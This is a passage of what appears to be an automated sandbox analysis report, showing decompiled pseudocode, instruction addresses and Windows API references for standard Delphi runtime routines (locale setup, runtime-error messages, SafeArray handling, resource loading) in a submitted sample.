					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040C9F4();
						_t113 = _t54;
						if(_t113 == 0) {
							E0040D544(_t100);
						}
						E0040DB18(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0040DB34(_v788 - 1, _t115) != 0) {
								L0040CA0C();
								E0040D7EC(_v792);
								L0040CA0C();
								E0040D7EC( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0040DB64(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040C9FC();
							E0040D7EC(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040CA04();
							E0040D7EC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























    0x0040dbc0
    0x0040dbcc
    0x0040dbd2
    0x0040dbd4
    0x0040dbde
    0x0040dbe5
    0x0040dbe5
    0x0040dbea
    0x0040dbf8
    0x0040dd71
    0x0040dd78
    0x0040dd79
    0x00000000
    0x0040dbfe
    0x0040dc01
    0x0040dc13
    0x0040dc03
    0x0040dc08
    0x0040dc08
    0x0040dc22
    0x0040dc2e
    0x0040dc31
    0x0040dc9e
    0x0040dca4
    0x0040dca5
    0x0040dcab
    0x0040dcac
    0x0040dcae
    0x0040dcb3
    0x0040dcb7
    0x0040dcb9
    0x0040dcb9
    0x0040dcc4
    0x0040dccf
    0x0040dcda
    0x0040dce3
    0x0040dce6
    0x0040dd02
    0x0040dd09
    0x0040dd14
    0x0040dd2b
    0x0040dd30
    0x0040dd44
    0x0040dd49
    0x0040dd5c
    0x0040dd5c
    0x0040dd65
    0x0040dce8
    0x0040dce8
    0x0040dce9
    0x0040dcef
    0x0040dcf5
    0x0040dcf7
    0x0040dcf9
    0x0040dcfc
    0x0040dcff
    0x0040dcff
    0x0040dd02
    0x00000000
    0x00000000
    0x00000000
    0x0040dd02
    0x0040dc33
    0x0040dc33
    0x0040dc34
    0x0040dc36
    0x0040dc3c
    0x0040dc3e
    0x0040dc4d
    0x0040dc4e
    0x0040dc58
    0x0040dc59
    0x0040dc5e
    0x0040dc69
    0x0040dc6a
    0x0040dc74
    0x0040dc75
    0x0040dc7a
    0x0040dc95
    0x0040dc97
    0x0040dc98
    0x0040dc9b
    0x0040dc9b
    0x00000000
    0x0040dc3c
    0x0040dc31

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00403C90, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x454044 == 0) {
					if( *0x419030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
						 *0x454230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
				}
			}





    0x00403c98
    0x00403cf8
    0x00403d08
    0x00403d08
    0x00403d0e
    0x00403c9a
    0x00403ca3
    0x00403cb3
    0x00403cb3
    0x00403ccf
    0x00403cf0
    0x00403cf0

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040B9A0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41
    C-Code - Quality: 100%
    			E0040B9A0() {
				struct HINSTANCE__** _t2;
				void* _t3;
				struct HINSTANCE__** _t5;
				struct HRSRC__* _t7;
				struct HINSTANCE__** _t8;
				intOrPtr* _t11;
				intOrPtr* _t12;
				struct HINSTANCE__* _t13;

				_t2 =  *0x452f9c; // 0x45402c
				if( *_t2 != 0) {
					_t5 =  *0x452f9c; // 0x45402c
					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
					_t8 =  *0x452f9c; // 0x45402c
					return LoadResource( *_t8, _t7);
				}
				_t3 = 0;
				_t11 =  *0x4530b8; // 0x419034
				_t12 =  *_t11;
				if(_t12 != 0) {
					while(1) {
						_t13 =  *(_t12 + 4);
						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
						if(_t3 != 0) {
							goto L5;
						}
						_t12 =  *_t12;
						if(_t12 != 0) {
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t3;
			}











    0x0040b9a3
    0x0040b9ab
    0x0040b9b4
    0x0040b9bc
    0x0040b9c2
    0x00000000
    0x0040b9ca
    0x0040b9d1
    0x0040b9d3
    0x0040b9d9
    0x0040b9dd
    0x0040b9df
    0x0040b9e8
    0x0040b9f3
    0x0040b9fa
    0x00000000
    0x00000000
    0x0040b9fc
    0x0040ba00
    0x00000000
    0x00000000
    0x00000000
    0x0040ba00
    0x0040b9df
    0x0040ba05
    0x0040ba05

    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00405945, Relevance: 9.0, APIs: 6, Instructions: 41
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
				 *0x419008 = 2;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454046 = 2;
				 *0x454000 = E00404B04;
				if(E00402F5C() != 0) {
					_t3 = E00402F8C();
				}
				E00403050(_t3);
				 *0x45404c = 0xd7b0;
				 *0x454218 = 0xd7b0;
				 *0x4543e4 = 0xd7b0;
				 *0x45403c = GetCommandLineA();
				 *0x454038 = E004012C0();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x4545b8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x454030 = _t11;
				return _t11;
			}





    0x00405945
    0x0040594a
    0x0040594f
    0x00405951
    0x00405958
    0x00405962
    0x0040596c
    0x00405973
    0x00405984
    0x00405986
    0x00405986
    0x0040598b
    0x00405990
    0x00405999
    0x004059a2
    0x004059b0
    0x004059ba
    0x004059ce
    0x00405a07
    0x004059d0
    0x004059de
    0x004059f6
    0x004059e0
    0x004059e0
    0x004059e0
    0x004059de
    0x00405a0c
    0x00405a11
    0x00405a16

    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040A980, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40ab3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x453064; // 0x405f58
					E00405824(_t52,  &_v8);
				} else {
					_t86 =  *0x453120; // 0x405f50
					E00405824(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x453068; // 0x405f00
					E00405824(_t60,  &_v372);
					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004040F8( &_v340, 0x105,  &_v297);
					E00407660(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x4530a0; // 0x405ff8
					E00405824(_t82,  &_v344);
					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040AB42);
				E00403E88( &_v372);
				E00403EAC( &_v344, 3);
				return E00403E88( &_v8);
			}

































    0x0040a980
    0x0040a98d
    0x0040a993
    0x0040a999
    0x0040a99f
    0x0040a9a5
    0x0040a9aa
    0x0040a9ab
    0x0040a9b0
    0x0040a9b3
    0x0040a9b9
    0x0040a9c0
    0x0040a9d4
    0x0040a9d9
    0x0040a9c2
    0x0040a9c5
    0x0040a9ca
    0x0040a9ca
    0x0040a9de
    0x0040a9eb
    0x0040a9f7
    0x0040aab3
    0x0040aab9
    0x0040aac3
    0x0040aac9
    0x0040aad0
    0x0040aad6
    0x0040aaec
    0x0040aaf1
    0x0040ab03
    0x0040aa1a
    0x0040aa1d
    0x0040aa23
    0x0040aa3b
    0x0040aa4c
    0x0040aa57
    0x0040aa5d
    0x0040aa67
    0x0040aa6d
    0x0040aa74
    0x0040aa7a
    0x0040aa90
    0x0040aa95
    0x0040aaa7
    0x0040aaac
    0x0040ab0c
    0x0040ab0f
    0x0040ab12
    0x0040ab1d
    0x0040ab2d
    0x0040ab3a

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040A31C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t74 = 0x40a49c;
				_t86 = 0x40a49c;
				_t83 =  *0x406188; // 0x4061d4
				if(E004032A0(_t87, _t83) != 0) {
					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00407764(_t74, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00407764(_v8, _t86);
			}































    0x0040a31c
    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040A31A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t75 = 0x40a49c;
				_t89 = 0x40a49c;
				_t85 =  *0x406188; // 0x4061d4
				if(E004032A0(_t92, _t85) != 0) {
					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00407764(_t75, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00407764(_v8, _t89);
			}































    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00402F8C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
    C-Code - Quality: 65%
    			E00402F8C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x419020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x419020; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x419020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402FFD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403004);
					return RegCloseKey(_v8);
				}
			}












    0x00402f8d
    0x00402f8f
    0x00402f99
    0x00402fb5
    0x00403004
    0x00403016
    0x00403019
    0x00403022
    0x00402fb7
    0x00402fb9
    0x00402fba
    0x00402fbf
    0x00402fc2
    0x00402fc5
    0x00402fe1
    0x00402fe8
    0x00402feb
    0x00402fee
    0x00402ffc
    0x00402ffc

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040A038, Relevance: 7.6, APIs: 5, Instructions: 50
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40a0cf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
				_t29 = E00407174(0x40a0e4, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x454764;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040A0D6);
				return E00403E88( &_v8);
			}










    0x0040a038
    0x0040a03b
    0x0040a040
    0x0040a041
    0x0040a046
    0x0040a049
    0x0040a05f
    0x0040a071
    0x0040a07b
    0x0040a08b
    0x0040a090
    0x0040a095
    0x0040a09a
    0x0040a09a
    0x0040a0a0
    0x0040a0a3
    0x0040a0a3
    0x0040a0b4
    0x0040a0b4
    0x0040a0bb
    0x0040a0be
    0x0040a0c1
    0x0040a0ce

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040A0E8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40a2b2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00403E88(__edx);
				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404148(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x419108], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404150(_t122, 0x40a30c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404070();
												E00404150(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404150(_t122, 0x40a300);
										_t92 = _t92 + 1;
									}
								} else {
									E00404150(_t122, 0x40a2ec);
									_t92 = _t92 + 3;
								}
							} else {
								E00404150(_t122, 0x40a2d8);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040B04C(_t124, _t92);
							E004043A8(_t124, _v8, _t92,  &_v20);
							E00404150(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x45473c; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00403EDC(_t122, _t124);
					} else {
						while(_t92 <= E00404148(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404070();
									E00404150(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040A2B9);
				return E00403EAC( &_v24, 4);
			}























    0x0040a0e8
    0x0040a0ed
    0x0040a0ee
